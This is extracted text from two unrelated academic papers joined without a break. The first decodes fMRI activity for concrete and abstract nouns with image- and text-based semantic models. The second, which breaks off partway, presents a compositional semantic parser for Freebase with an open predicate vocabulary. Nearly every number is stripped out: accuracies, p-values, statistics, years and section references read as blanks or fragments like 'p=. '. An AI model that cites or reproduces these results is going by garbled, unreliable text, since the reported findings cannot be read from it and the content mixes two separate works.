specifically, we obtained -dimensional word embeddings by training a skip-gram model using negative sampling on recent italian and english wikipedia dumps (using gensim with preprocessing from word vec’s demo script). for english, representations were built for the en- glish translations of the stimuli provided by an- derson et al. ( ). the english model was trained for iteration, whereas the italian was trained for , since the italian wikipedia dump was smaller ( . vs . billion words respectively). following previous work exploiting cross-lingual textual resources (richman and schone, ; shi et al., ; darwish, ), we also applied ital- ian and english text-based models in combination. model combination was achieved at the analysis stage, by fusing decoding outputs of italian and en- glish models as described in section . . representational similarity-based decoding of brain activity we decoded word-level fmri representations using the semantic models following the procedure intro- duced by anderson et al. ( ). the process of matching models to words is abstracted to represen- tational similarity space: for both models and brain data, words are semantically re-represented by their similarities to other words by correlating all word pairs within the native model or brain space, using pearson’s correlation (see figure ). the result is two square matrices of word pair correlations: one for the fmri data, another for the model. in the similarity space, each word is a vector of correla- tions with all other words, thereby allowing model and brain words (similarity vectors) to be directly matched to each other. in decoding, models were matched to fmri data as follows (see figure ). two test words were cho- sen. the voxels estimated to have the most stable signal were selected using the strategy de- scribed in section . . voxel selection was based on the fmri data of the other / words. se- lection on / rather than all words was to allay any concern that voxel selection could have systematically biased the fmri correlation structure (calculated next) to look like that of the semantic model, and consequently biased decoding perfor- mance. however, as similarity-based decoding does not optimise a mapping between fmri data and se- mantic model, it is not prone to modelling and de- coding fmri noise as in classic cases of double dip- ping (kriegeskorte et al., ). indeed, as we report later in this section, there were no significant differ- ences in decoding accuracy arising from tests using voxel selection on / versus words. a single representation of each word was built by taking the voxel-wise mean of all five presentations of the word for the selected voxels. an fmri similarity matrix for all words was then calcu- lated. similarity vectors for the two test words were drawn from both the model and fmri similarity ma- trices. entries corresponding to the two test words in both model and fmri similarity vectors were re- moved because these values could reveal the correct answer to decoding. the two model similarity vec- tors were then compared to the two fmri similar- ity vectors by correlation, resulting in four corre- lation values. these correlation values were trans- formed using fisher’s r to z (arctanh). if the sum of z-transformed correlations between the correctly matched pair exceeded the sum of correlations for the incongruent pair, decoding was scored a success, otherwise a failure. this process was then repeated for all word pairs, with the mean accuracy of all test iterations giving a final measure of success. fisher’s r to z transform (arctanh) is typically used to test for differences between correlation coeffi- cients. it transforms the correlation coefficient r to a value z, where z has amplified values at the tails of the correlation coefficient (r otherwise ranges be- tween - and ). this is to make the sampling distri- bution of z normally distributed, with approximately constant variance values across the population corre- lation coefficient. in the similarity-decoding method used here, z is evaluated in decoding because it is a more principled metric to compare and combine (as later undertaken in section . ) however, under most circumstances r to z is not critical to the procedure. z noticeably differs from r only when correlations exceed . , and r to z changes decoding behaviour in select circumstances. specif- ically r to z can influence how word labels are as- figure : similarity-decoding algorithm (adapted from anderson et al. ). signed to similarity vectors by upweighting high value correlation coefficients at the final stage of de- coding. a hypothetical scenario to illustrate the above point is as follows. let pearson(x,y) denote pear- son’s correlation of vectors x and y, and braina cor- respond to a brain similarity vector “a” for an un- known word label, and model to a semantic model similarity vector for a known word label “ ”. in the final stage of analysis, there are two decoding alter- natives given by (i) pearson(braina,model )=. and pearson(brainb,model )=. , which when summed gives . ; (ii) pearson(braina,model )=. , pear- son(brainb,model )=. . here the sum is also . and therefore (i) and (ii) are identical. applying the r to z transform would result in selection of (ii) because arctanh(. )+arctanh(. )= . , whereas arc- tanh(. )+arctanh(. )= . . statistical significance of decoding accuracy was determined by permutation testing. decoding was repeated multiple times using the following proce- dure: creating a vector of word-label indices and randomly shuffling these indices; applying the vec- tor of shuffled indices to reorder both rows and columns of only one of the similarity matrices (whilst keeping the original correct row/column la- bels so that word-labels now mismatch matrix con- tents); and repeating the entire pair-matching decod- ing procedure described above. if word labels are randomly assigned to similarity vectors, we expect a chance-level decoding accuracy of %. repeti- tion of this process (here , repeats) supplies a null distribution of decoding accuracies achieved by chance. the p-value of decoding accuracy is calcu- lated as the proportion of chance accuracies that are greater than or equal to the observed decoding accu- racy. for permutation testing only, voxel selection was undertaken a single time, per participant, on all words (rather than on / words in each leave- - out decoding iteration). this was to reduce com- putation time that would otherwise have been pro- hibitive. this is very unlikely to have yielded any discernible difference in outcome. unlike de- coding strategies, that involve fitting a classifica- tion/encoding model to fmri data (and are prone to fitting and subsequently decoding fmri noise), similarity-based decoding does not learn a mapping between semantic-model and fmri data and is ro- bust to “double dipping” giving spurious decoding accuracies (see kriegeskorte et al. ( ) for prob- lems associated with double dipping). as an empirical demonstration, we reran all of our actual (non-permuted) model-based de- coding analyses, that are reported later in sec- tion . , whilst selecting voxels from all words (as opposed to leave- -out voxel-selection on / words). specifically, decoding analyses were re- peated for all model combinations, and tested first on all words, then for the most concrete words only, and finally the most abstract words only. mean de- coding accuracies for the participants yielded with and without leave- -out voxel selection were com- pared using paired t-tests. there were no significant differences across all tests. the most different (non-significant) individual result was t= . , p=. ( -tailed), and in this case leave- -out voxel selec- tion gave the higher accuracy. . model combination by ensemble averaging to test whether the three different semantic mod- els (image-based, italian/english text-based) carried complementary information, we combined the mod- els in evaluation, thus allowing us to test whether accuracies achieved using model combinations were higher than those achieved with isolated models. to combine the different models, we used an en- semble averaging strategy and ran the similarity- based decoding analyses as described above in par- allel with each of the three semantic models. at each leave- -out test iteration, this gave three arc- tanh transformed * correlation matrices (one for each semantic model) that were used to evaluate de- coding. model combination was achieved by fusing the respective arctanh transformed correlation ma- trices by summing them together. evaluation of the resulting × summation matrix proceeded as previ- ously by first summing the two congruent values on the main-diagonal of the matrix, then summing the two incongruent scores on the counter-diagonal. if the congruent sum was greater than the incongruent sum, decoding was a success, otherwise a failure. results we split the stimulus nouns into the most con- crete and most abstract words according to the behavioural concreteness ratings from anderson et al. ( ), and ran analyses on all words combined and these two subsets. due to limitations in word coverage of the semantic models, ‘melody’ was missing from the abstract words, and ‘skeleton-key’ and ‘police-station’ were missing from the most concrete words (hence / words were analysed). . hypotheses dual coding theory (paivio, ) leads to the fol- lowing hypotheses: ( ) the text-based models will decode the more abstract nouns’ neural activity pat- terns with higher accuracy than the image-based model; ( ) both image and text-based models will decode the more concrete nouns’ neural activity. we also compared the decoding accuracy for the most concrete nouns achieved using the combined image- and text-based models to the unimodal mod- els in isolation. whilst previous analyses have ob- served advantages of multimodal models in describ- ing concrete noun fmri, it is not clear whether this effect will carry over to our noun data set. one reason is because many of the most concrete half are “less concrete” than those of previous studies: according to brysbaert et al. ( )’s concreteness norms (where words were rated on a scale from to ), the mean ± sd rating of the concrete nouns analysed by mitchell et al. ( ) (and subsequently by anderson et al. ( )) is . ±. , whereas the mean ± sd of the “most concrete” nouns anal- ysed in the current article, when tested with an inde- pendent samples t-test, was significantly smaller at . ±. (t = . , p < . , -tail). a second reason is that the experimental task required par- ticipants to imagine a situation associated with the noun, rather than think of object properties. there- fore this analysis was of a more exploratory nature. . decoding analysis decoding analyses were run using the image-based model and italian and english text-based models in isolation, and also all combinations of these models as described in section . results are in figure . in this section we use the abbreviations img for the image-based model and txit and txen, for the ital- ian and english text-based models, respectively. in all tests, chance-level decoding accuracy (the expected accuracy if word labelling is random) is %. mean±se accuracies across all participants are displayed in the leftmost column of plots for all model combinations. individual-level results are displayed for only three model combinations to avoid cluttering the graphs (img only, the combined txit&txen, and the combined img&txit&txen). to simplify the following discussion of results, we mainly focus on these three models. the choice to focus on txit&txen, rather than the italian model, was made following the rationale that the language combination would leverage cultural nu- ances of semantic structure found in the italian text- corpora jointly with the more extensive coverage of the larger english wikipedia. although txit&txen and txen tended to produce higher decoding accu- racies, there were no significant differences between either txit or txen tested in isolation, or any model combination incorporating them. mean results are displayed for all model combinations in figure and key results are tabulated in table . . an advantage for the textual model on abstract nouns with respect to hypothesis (an advantage for the text-based models decoding abstract neural activity patterns), the key difference to observe in figure is the drop in relative decoding accuracy between the image-based model and text-based models when decoding the most abstract nouns. the nine partic- ipant’s mean decoding accuracies for the most ab- stract nouns were compared between the img, txit, txen and txit&txen models using repeated mea- sures anova. combinations of image and text- based models (e.g. img&txen) were not directly relevant to this analysis (because they integrate vi- sual and textual data) and consequently these mod- els were excluded. bartlett’s test was used to verify that there was no evidence against homogeneity of variances prior to analysis (χ = . , p = . ). the anova indicated a statistically significant differ- ence between models: f( , ) = . , p < . . post hoc comparisons conducted using the tukey hon- est significant difference (hsd) test revealed that decoding accuracies achieved using txen and the img txit & txen img &txit & txen p=. img txit & txen img &txit & txen p=. img txit & txen img &txit & txen p=. figure : results of the decoding analysis from section . . see also table . p=. lines were empirically estimated as described in section and apply to decoding an individual’s fmri data (not multiple individuals). all words combined most concrete most abstract img ± %, / (<. ) ± %, / (<. ) ± %, / (. ) txit&txen ± %, / (<. ) ± %, / (<. ) ± %, / (<. ) img&txit&txen ± %, / (<. ) ± %, / (<. ) ± %, / (<. ) table : key decoding accuracies from section . (see also figure ). each cell shows mean±se decoding accuracy, the number (n) of participants decoded at a level significantly above chance (p<. ), and in round brackets, the cumulative binomial probability of achieving ≥ n significant results at p=. . txit&txen model were significantly different (and larger than) img (both p < . ). there were no other significant differences (including between img and txit). one possible reason for the weaker perfor- mance of txit than txen is that italian wikipedia is a less rich source of information due to being smaller in size than english wikipedia (despite it presum- ably containing semantic information that is more relevant to italian culture). . both image and text-based models decode the more concrete nouns that both image- and text-based models signifi- cantly decoded the most concrete nouns is consis- tent with hypothesis . to test for differences be- tween image- and text-based models, mean decod- ing accuracies for the nine participants on the most concrete nouns were compared for the img, txit, txen and txit&txen models using repeated mea- sures anova. combinations of image- and text- based models (e.g. img&txen) were not directly relevant to this analysis (because they integrate vi- sual and textual data) and so these models were ex- cluded. bartlett’s test was used to verify homo- geneity of variances prior to analysis (χ = . , p = . ). the anova detected no statistically sig- nificant differences between the models: f( , ) = . , p = . . therefore when decoding the most concrete nouns there was no significant difference in accuracy between image-based and any text-based model. . no overall advantage for multimodal models on the more concrete nouns the third exploratory test compared the accuracy of the multimodal combination of image- and text- based models to the unimodal models when decod- ing the more concrete neural activity patterns. for the most concrete words, the highest scor- ing combination across all models was img&txen (mean±se= ± %). whilst this proved to be sig- nificantly greater than img (t = . , p <= . , df = , -tail), it was not significantly greater than txen (t = . , p = . , df = , -tail). turning to the analogous case for the italian models, img&txit (mean±se= ± %) was not significantly greater than img (t = . , p = . , df = , -tail), or txit (t = . , p = . , df = , -tail). therefore, although multimodal combinations re- turned higher accuracies than either the image- and text-based models in isolation (for concrete words), decoding accuracy was not significantly higher than either image- or text-based models. previous work decoding neural activity associated with concrete nouns has found image-based mod- els to supply complementary information to text- based models (anderson et al., ). we suggest three reasons that image-based models may have been disadvantaged in the current study compared to these past analyses. firstly, anderson et al. fo- cused on fmri data elicited by unambiguously con- crete nouns, whereas the experimental nouns anal- ysed in the current article were mostly intended to be ‘less than concrete’ (of the seven taxonomic cate- gories investigated only ‘objects/tools’ was designed to be unambiguously concrete). secondly, anderson et al. used more images to build noun representa- tions (on average images per noun compared to used here), and nouns in the imagenet images were segmented according to bounding boxes. con- sequently their input may have been less noisy than google images (which we used because of its wider coverage). finally, the experimental task of the pre- vious analyses required participants to actively think about the properties of objects, whereas the current data set was elicited as participants imagined situ- ations associated with nouns (and hence may have invoked neural representations with more contextual elements). the lack of a significant increase in decoding ac- curacy achieved by pairing image- and text-based models allows us to infer that the text-based model contained many aspects of the visual semantic struc- ture found in the image-based model. of course we expect modal structure in text-based models com- mensurate with what people are inclined to report in writing; e.g., it is easy to convey in text that both bananas and lemons are yellow and curvy, and light- bulbs and pears have similar shapes. therefore we would anticipate correspondences in semantic sim- ilarities between image and text-based models and for these correspondences to extend to match neural similarities, e.g., as induced by participants viewing pictures of objects (carlson et al., ). . group-level decoding analysis the similarity-based decoding approach we have ap- plied enables group-level neural representations to be built simply by taking the mean similarity matrix over participants. values in the correlation matrix were r to z (arctanh) transformed prior to averaging, then the average values were back transformed to the original range using tanh. this was because aver- aging z-transformed values (and back transforming) tends to yield less biased estimates of the population value than averaging the raw coefficients (silver and dunlap, ). however, in the current analysis re- sults obtained with z-transformation versus without it were virtually identical. building group-level representations by averag- ing correlation matrices side-steps potential prob- lems surrounding the obvious alternative method of averaging data in fmri space, where anatom- ical/functional differences between different peo- ples’ brains may result in relatively similar activity patterns being spatially mismatched in the standard- ised fmri space. the motivation behind building group-level neural representations is that we might expect these to better match the computational se- mantic models than individual-level data. this is because the models are also built at group-level, cre- ated from the photographs and text of many individ- uals. however building group-level neural represen- tations will only be beneficial if there exist group- level commonalities in representational similarity (when combining data will reduce noise) as opposed to individual semantic representational schemes. accuracies achieved using models to decode the group-level neural similarity matrices are displayed in the final column of the bar charts at the right of figure . specifically, decoding accuracies were: for all words combined: img= . %, txit&txen= . % and img&txit&txen= . %. for the most concrete words: img= . %, txit&txen= . % and img&txit&txen= . %. for the most abstract words: img= . %, txit&txen= . % and img&txit&txen= . %. to statistically test whether group-level decod- ing accuracies surpassed those of the individual- level results, we compared the set of individual- level mean accuracies to the corresponding group- level mean accuracy using one sample t-tests. in all tests (see table ) the individual-level accuracies were significantly different (lower) than the group- level accuracy (corrected for multiple comparisons using false discovery rate (benjamini and hochberg, )). this is indicative of group-level regularities in semantic similarity for both concrete and abstract nouns and also their combination. a qualitative observation is that the differences between group and individual-level accuracy appear to be greater for concrete nouns. this could be con- sistent with participants having a more subjective se- mantic representation of abstract nouns; however we did not attempt to statistically test this claim. this is because a meaningful comparison would require concrete and abstract words to be controlled by be- ing at least equally discriminable at individual level and this does not appear to be the case with this dataset. conclusion this article has demonstrated that neural activity patterns elicited in mental situations of abstract nouns can be decoded using text-based compu- tational semantic models, thus demonstrating that computational semantic models can make a con- tribution to interpreting the semantic structure of neural activity patterns associated with abstract nouns. furthermore, by comparing how well vi- sually grounded and textual semantic models de- all words combined most concrete most abstract img - . (. ) - . (. ) - . (. ) txit&txen - . (. ) - . (. ) - . (. ) img&txit&txen - . (. ) - . (. ) - . (. ) table : results of one sample t-tests comparing the set of individual-level mean decoding accuracies to the group- level accuracy (see section . ). all tests were -tailed with df= . the first number in each cell is the t-statistic, the second number in round brackets is the p-value (corrected according to false discovery rate). code brain activity associated with concrete or ab- stract nouns, we have observed a selective advan- tage for textual over visual models in decoding the more abstract nouns. this has therefore provided initial model-based brain decoding evidence that is broadly in line with the predictions of dual coding theory (paivio, ). however, results should be interpreted in light of the following two factors. first, the dataset analysed was for a small sample of words, and it is reasonable to conjecture that some of these words are also encoded in modalities other than vision and language. for example, mu- sical words may be encoded in acoustic and motor features (see also fernandino et al. ( )). future work will be necessary to verify that the findings generalise more broadly to words from domains be- yond law and music. in work in progress the authors are undertaking more focused analyses on the cur- rent dataset, using textual, visual and newly devel- oped audio semantic modes (kiela and clark, ) to tease apart linguistic, visual and acoustic con- tributions to semantic representation and how these vary throughout different regions of the brain. a second limitation of the current approach, as pointed out by a reviewer, is that the google im- age search algorithm (the workings of which are un- known to the authors) may not perform as well for abstract words as it does for concrete words. con- sequently, the visual model may have been handi- capped compared to the textual model when decod- ing neural representations associated with more ab- stract words. we have no current measure of the de- gree of this effect, but it may be possible to alleviate it in future work, by having participants manually select images that they associate with abstract stim- ulus words, and using computational representations derived from these images in the analysis. secondary results are that we have exploited rep- resentational similarity space to build group-level neural representations which better match our inher- ently group-level computational semantic models. in so doing, this exposes group-level commonalities in neural representation for both concrete and ab- stract words. such group-level representations may prove both a useful test-bed for evaluating compu- tational semantic models, as well as a potentially useful information source to incorporate into com- putational models (see fyshe et al. ( ) for related work). finally we have demonstrated that english and italian text-based models are roughly interchange- able in our neural decoding task. that the en- glish text-based model tended to return marginally higher results on our italian brain data than the ital- ian model provides a cautionary note for future stud- ies wishing to use semantic models from different languages to identify culturally specific aspects of neural semantic representation e.g., as a follow up to zinszer et al. ( ). however we also note that the english wikipedia data was larger than the cor- responding italian corpus. acknowledgments we thank three anonymous reviewers for their in- sightful comments and suggestions, brian murphy for his involvement in the configuration, collection and preprocessing of the original dataset, and marco baroni and elia bruni for early conversations on some of the ideas presented. stephen clark is sup- ported by erc starting grant discotex ( ). references a. j. anderson, e. bruni, u. bordignon, m. poesio, and m. baroni. . of words, eyes and brains: correlat- ing image-based distributional semantic models with neural representations of concepts. in proceedings of emnlp, pages – , seattle, wa. a. j. anderson, b. murphy, and m. poesio. . discriminating taxonomic categories and domains in mental simulations of concepts of varying concrete- ness. j. cognitive neuroscience, ( ): – . a. j. anderson, e. bruni, a. lopopolo, m. poesio, and m. baroni. . reading visually embodied mean- ing from the brain: visually grounded computational models decode visual-object mental imagery induced by written text. neuroimage, : – . a. j. anderson, b. d zinszer, and r. d. s. raizada. . representational similarity encoding for fmri: pattern-based synthesis to predict brain activity using stimulus-model-similarities. neuroimage, : – . m. andrews, g. vigliocco, and d. vinson. . in- tegrating experiential and distributional data to learn semantic representations. psychological review, ( ): – . l. barca, c. burani, and l. s. arduino. . word naming times and psycholinguistic norms for italian nouns. behavior research methods, instruments, & computers, : – . y. benjamini and y. hochberg. . controlling the false discovery rate: a practical and powerful ap- proach to multiple testing. journal of the royal sta- tistical society, series b (methodological), ( ): – . l. bentivogli, p. forner, b. magnini, and e. pianta. . revising the wordnet domains hierarchy: seman- tics, coverage, and balancing. in proceedings of the workshop on multilingual linguistic resources, pages – , geneva, switzerland. s. bergsma and b. van durme. . learning bilingual lexicons using the visual similarity of labeled web im- ages. in ijcai, pages – . r. bruffaerts, p. dupont, r. peeters, s. de deyne, g. storms, and r. vandenberghe. . similar- ity of fmri activity patterns in left perirhinal cortex reflects similarity between words. j. neuroscience, ( ): – . e. bruni, n. k. tran, and m. baroni. . multimodal distributional semantics. journal of artifical intelli- gence research, : – . m. brysbaert, a. b. warriner, and v. kuperman. . concreteness ratings for thousand generally known english word lemmas. behavior research methods, ( ): – . t. a. carlson, r.a. simmons, and n. kriegeskorte. . the emergence of semantic meaning in the ventral temporal pathway. j. cognitive neuroscience, ( ): – . k. m. chang, t. m. mitchell, and m. a. just. . quantitative modeling of the neural representations of objects: how semantic feature norms can account for fmri activation. neuroimage: special issue on mul- tivariate decoding and brain reading, : – . k. darwish. . named entity recognition using cross-lingual resources: arabic as an example. in proc. acl, pages – . b. devereux, c. kelly, and a. korhonen. . us- ing fmri activation to conceptual stimuli to evalu- ate methods for extracting conceptual representations from corpora. in proceedings of the naacl hlt first workshop on computational neurolinguistics, pages – , los angeles, usa. c. fellbaum, editor. . wordnet: an electronic database. mit press, cambridge, ma. r. fergus, l. fei-fei, p. perona, and a. zisserman. . learning object categories from google’s im- age search. in iccv, pages – . l. fernandino, c. j. humphries, m. s. seidenberg, w. l. gross, l. l. conant, and j. r. binder. . prediction of brain activation patterns as- sociated with individual lexical concepts based on five sensory-motor attributes. neuropsycholigia. doi: . /j.neuropsychologia. . . . a. fyshe, p. p. talukdar, b. murphy, and t. m. mitchell. . interpretable semantic vectors from a joint model of brain-and text-based meaning. in proceed- ings of acl, pages – , baltimore, md. y. jia, e. shelhamer, j. donahue, s. karayev, j. long, r. b. girshick, s. guadarrama, and t. darrell. . caffe: convolutional architecture for fast feature em- bedding. in acm multimedia, pages – . d. kiela and l. bottou. . learning image em- beddings using convolutional neural networks for im- proved multi-modal semantics. in proceedings of emnlp, pages – , doha, qatar. d. kiela and s. clark. . multi- and cross-modal semantics beyond vision: grounding in auditory per- ception. in proceedings of the empirical methods in natural language processing conference (emnlp ), pages – , lisbon, portugal. d. kiela, f. hill, a. korhonen, and s. clark. . im- proving multi-modal representations using image dis- persion: why less is sometimes more. in proceedings of acl . n. kriegeskorte, w. k. simmons, p. s. f. bellgowan, and c. i. baker. . circular analysis in systems neuro- science: the dangers of double dipping. nature neu- roscience, : – . n. kriegeskorte. . deep neural networks: a new framework for modeling biological vision and brain information processing. annual review of vision sci- ence, : – . t. mikolov, k. chen, g. corrado, and j. dean. . efficient estimation of word representations in vector space. in proceedings of iclr, scottsdale, arizona, usa. t. m. mitchell, s. v. shinkareva, a. carlson, k.-m. chang, v. l. malave, r. a. mason, and m. a. just. . predicting human brain activity associated with the meaning of nouns. science, : – . b. murphy, p. talukdar, and t. mitchell. . selecting corpus-semantic models for neurolinguistic decoding. in proceedings of the first joint conference on lexi- cal and computational semantics (*sem), pages – , montreal, canada. a paivio, editor. . imagery and verbal processes. holt, rinehart, and winston, new york. m. palatucci, d. pomerleau, g. hinton, and t. mitchell. . zero-shot learning with semantic output codes. neural information processing systems, : – . f. pereira, m. botvinick, and g. detre. . using wikipedia to learn semantic feature representations of concrete concepts in neuroimaging experiments. artif. intell., : – . a. s. razavian, h. azizpour, j. sullivan, and s. carls- son. . cnn features off-the-shelf: an astound- ing baseline for recognition. in ieee conference on computer vision and pattern recognition workshops , pages – . a. e. richman and p. schone. . mining wiki re- sources for multilingual named entity recognition. in proc. acl. l. shi, r. mihalcea, and m. tian. . cross- language text classification by model translation and semi-supervised learning. in proc. emnlp. n. c. silver and w. p. dunlap. . averaging correla- tion coefficients: should fisher’s z transformation be used? j. applied psychology, ( ): – . j. sivic and a. zisserman. . video google: a text retrieval approach to object matching in videos. in iccv, pages – . g. sudre, d. pomerleau, m. palatucci, l. wehbe, a. fyshe, r. salmelin, and t. mitchell. . track- ing neural coding of perceptual and semantic features of concrete nouns. neuroimage, : – . k. wiemer-hastings and x. xu. . content differ- ences for abstract and concrete concepts. cognitive science, : – . b. d. zinszer, a. j. anderson, o. kang, t. wheatley, and r. d. s. raizada. . semantic structural align- ment of neural representational spaces enables transla- tion between english and chinese words. j. cognitive neuroscience, ( ): – . learning a compositional semantics for freebase with an open predicate vocabulary jayant krishnamurthy carnegie mellon university forbes avenue pittsburgh, pa jayantk@cs.cmu.edu tom m. mitchell carnegie mellon university forbes avenue pittsburgh, pa tom.mitchell@cmu.edu abstract we present an approach to learning a model- theoretic semantics for natural language tied to freebase. crucially, our approach uses an open predicate vocabulary, enabling it to produce denotations for phrases such as “re- publican front-runner from texas” whose se- mantics cannot be represented using the free- base schema. our approach directly converts a sentence’s syntactic ccg parse into a log- ical form containing predicates derived from the words in the sentence, assigning each word a consistent semantics across sentences. this logical form is evaluated against a learned probabilistic database that defines a distribu- tion over denotations for each textual pred- icate. a training phase produces this prob- abilistic database using a corpus of entity- linked text and probabilistic matrix factoriza- tion with a novel ranking objective function. we evaluate our approach on a compositional question answering task where it outperforms several competitive baselines. we also com- pare our approach against manually annotated freebase queries, finding that our open pred- icate vocabulary enables us to answer many questions that freebase cannot. introduction traditional knowledge representation assumes that world knowledge can be encoded using a closed vocabulary of formal predicates. in recent years, semantic parsing has enabled us to build compo- sitional models of natural language semantics us- ing such a closed predicate vocabulary (zelle and mooney, ; zettlemoyer and collins, ). these semantic parsers map natural language state- ments to database queries, enabling applications such as answering questions using a large knowl- edge base (yahya et al., ; krishnamurthy and mitchell, ; cai and yates, ; kwiatkowski et al., ; berant et al., ; berant and liang, ; reddy et al., ). furthermore, the model- theoretic semantics provided by such parsers have the potential to improve performance on other tasks, such as information extraction and coreference res- olution. however, a closed predicate vocabulary has inher- ent limitations. first, its coverage will be limited, as such vocabularies are typically manually con- structed. second, it may abstract away potentially relevant semantic differences. for example, the se- mantics of “republican front-runner” cannot be ad- equately encoded in the freebase schema because it lacks the concept of a “front-runner.” we could choose to encode this concept as “politician” at the cost of abstracting away the distinction between the two. as this example illustrates, these two problems are prevalent in even the largest knowledge bases. an alternative paradigm is an open predicate vocabulary, where each natural language word or phrase is given its own formal predicate. this paradigm is embodied in both open information ex- traction (banko et al., ) and universal schema (riedel et al., ). open predicate vocabularies have the potential to capture subtle semantic distinc- tions and achieve high coverage. however, we have yet to develop compelling approaches to composi- tional semantics within this paradigm. this paper takes a step toward compositional se- transactions of the association for computational linguistics, vol. , pp. – , . action editor: katrin erk. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. distributed under a cc-by-nc-sa . license. input text republican front-runner from texas → logical form λx.∃y,z.front-runner(x)∧y = /en/republican∧nn(y,x)∧z = /en/texas ∧ from(x,z) → entity prob. /en/george bush . /en/rick perry . ... φ θ texas repub. g. bush ... f. -r u n . p o l . s t a t e .. . entity/predicate embeddings φ θ (g. bush, texas) (g. bush, repub.) (repub., g. bush) ... f r o m l iv e s in n n .. . → texas repub. g. bush ... f. -r u n . p o l . s t a t e .. . . . . . . . . . . probabilistic database (g. bush, texas) (g. bush, repub.) (repub., g. bush) ... f r o m l iv e s in n n .. . . . . . . . . . . figure : overview of our approach. top left: the text is converted to logical form by ccg syntactic parsing and a collection of manually-defined rules. bottom: low-dimensional embeddings of each entity (entity pair) and category (relation) are learned from an entity-linked web corpus. these embeddings are used to construct a probabilistic database. the labels of these matrices are shortened for space reasons. top right: evaluating the logical form on the probabilistic database computes the marginal probability that each entity is an element of the text’s denotation. mantics with an open predicate vocabulary. our ap- proach defines a distribution over denotations (sets of freebase entities) given an input text. the model has two components, shown in figure . the first component is a rule-based semantic parser that uses a syntactic ccg parser and manually-defined rules to map entity-linked texts to logical forms contain- ing predicates derived from the words in the text. the second component is a probabilistic database with a possible worlds semantics that defines a dis- tribution over denotations for each textually-derived predicate. this database assigns independent prob- abilities to individual predicate instances, such as p(front-runner(/en/george bush)) = . . together, these components define an exponentially- large distribution over denotations for an input text; to simplify this output, we compute the marginal probability, over all possible worlds, that each entity is an element of the text’s denotation. the learning problem in our approach is to train the probabilistic database to predict a denotation for each predicate. we pose this problem as probabilis- tic matrix factorization with a novel query/answer ranking objective. this factorization learns a low- dimensional embedding of each entity (entity pair) and category (relation) such that the denotation of a predicate is likely to contain entities or entity pairs with nearby vectors. to train the database, we first collect training data by analyzing entity-linked sen- tences in a large web corpus with the rule-based semantic parser. this process generates a collec- tion of logical form queries with observed entity an- swers. the query/answer ranking objective, when optimized, trains the database to rank the observed answers for each query above unobserved answers. we evaluate our approach on a question answer- ing task, finding that our approach outperforms sev- eral baselines and that our new training objective improves performance over a previously-proposed objective. we also evaluate the trade-offs between open and closed predicate vocabularies by compar- ing our approach to a manually-annotated freebase query for each question. this comparison reveals that, when freebase contains predicates that cover the question, it achieves higher precision and recall than our approach. however, our approach can cor- rectly answer many questions not covered by free- base. system overview the purpose of our system is to predict a denota- tion γ for a given natural language text s. the de- notation γ is the set of freebase entities that s refers to; for example, if s = “president of the us,” then γ = {/en/obama, /en/bush, ...}. our system this paper uses a simple model-theoretic semantics where the denotation of a noun phrase is a set of entities and the de- notation of a sentence is either true or false. however, for no- tational convenience, denotations γ will be treated as sets of entities throughout. represents this prediction problem using the follow- ing probabilistic model: p(γ|s) = ∑ w ∑ ` p(γ|`,w)p(w)p(`|s) the first term in this factorization, p(`|s), is a dis- tribution over logical forms ` given the text s. this term corresponds to the rule-based semantic parser (section ). this semantic parser is deterministic, so this term assigns probability to a single logical form for each text. the second term, p(w), repre- sents a distribution over possible worlds, where each world is an assignment of truth values to all possible predicate instances. the distribution over worlds is represented by a probabilistic database (section ). the final term, p(γ|`,w), deterministically evalu- ates the logical form ` on the world w to produce a denotation γ. this term represents query evaluation against a fixed database, as in other work on seman- tic parsing. section describes inference in our model. to produce a ranked list of entities (figure , top right) from p(γ|s), our system computes the marginal probability that each entity is an element of the de- notation γ. this problem corresponds to query eval- uation in a probabilistic database, which is known to be tractable in many cases (suciu et al., ). section describes training, which estimates pa- rameters for the probabilistic database p(w). this step first automatically generates training data using the rule-based semantic parser. this data is used to formulate a matrix factorization problem that is op- timized to estimate the database parameters. rule-based semantic parser the first part of our compositional semantics system is a rule-based system that deterministically com- putes a logical form ` for a text s. this component is used during inference to analyze the logical struc- ture of text, and during training to generate training data (see section . ). several input/output pairs for this system are shown in figure . the conversion to logical form has phases: . ccg syntactic parsing parses the text and ap- plies several deterministic syntactic transfor- mations to facilitate semantic analysis. . entity linking marks known freebase entities in the text. . semantic analysis assigns a logical form to each word, then composes them to produce a logical form for the complete text. . syntactic parsing the first step in our analysis is to syntactically parse the text. we use the asp-syn parser (kr- ishnamurthy and mitchell, ) trained on ccg- bank (hockenmaier and steedman, ). we then automatically transform the resulting syntactic parse to make the syntactic structure more amenable to semantic analysis. this step marks nps in conjunctions by replacing their syntactic category with np[conj]. this transformation allows seman- tic analysis to distinguish between appositives and comma-separated lists. it also transforms all verb ar- guments to core arguments, i.e., using the category pp/np as opposed to ((s\np)\(s\np))/np. this step simplifies the semantic analysis of verbs with prepositional phrase arguments. the final transformation adds a word feature to each pp cat- egory, e.g., mapping pp to pp[by]. these features are used to generate verb-preposition relation predi- cates, such as directed by. . entity linking the second step is to identify mentions of freebase entities in the text. this step could be performed by an off-the-shelf entity linking system (ratinov et al., ; milne and witten, ) or string matching. however, our training and test data is derived from clueweb , so we rely on the entity linking for this corpus provided by gabrilovich et. al ( ). our system incorporates the provided entity links into the syntactic parse provided that they are con- sistent with the parse structure. specifically, we re- quire that each mention is either ( ) a constituent in the parse tree with syntactic category n or np or ( ) a collection of n/n or np/np modifiers with a single head word. the first case covers noun and noun phrase mentions, while the second case cov- ers noun compounds. in both cases, we substitute a single multi-word terminal into the parse tree span- ning the mention and invoke special semantic rules for mentions described in the next section. dan hesse, ceo of sprint λx.∃y.x = /en/dan hesse ∧ ceo(x)∧ of(x,y)∧y = /en/sprint yankees pitcher λx.∃y.pitcher(x)∧ nn(y,x)∧y = /en/yankees tom cruise plays maverick in the movie top gun. ∃x,y,z.x = /en/tom cruise ∧ plays(x,y) ∧ y = /en/maverick (character) ∧ plays in(x,z)∧z = /en/top gun figure : example input/output pairs for our seman- tic analysis system. mentions of freebase entities in the text are indicated by underlines. . semantic analysis the final step uses the syntactic parse and entity links to produce a logical form for the text. the sys- tem induces a logical form for every word in the text based on its syntactic ccg category. composing these logical forms according to the syntactic parse produces a logical form for the entire text. our semantic analyses are based on a relatively naı̈ve model-theoretic semantics. we focus on lan- guage whose semantics can be represented with existentially-quantified conjunctions of unary and binary predicates, ignoring, for example, tempo- ral scope and superlatives. generally, our sys- tem models nouns and adjectives as unary predi- cates, and verbs and prepositions as binary predi- cates. special multi-word predicates 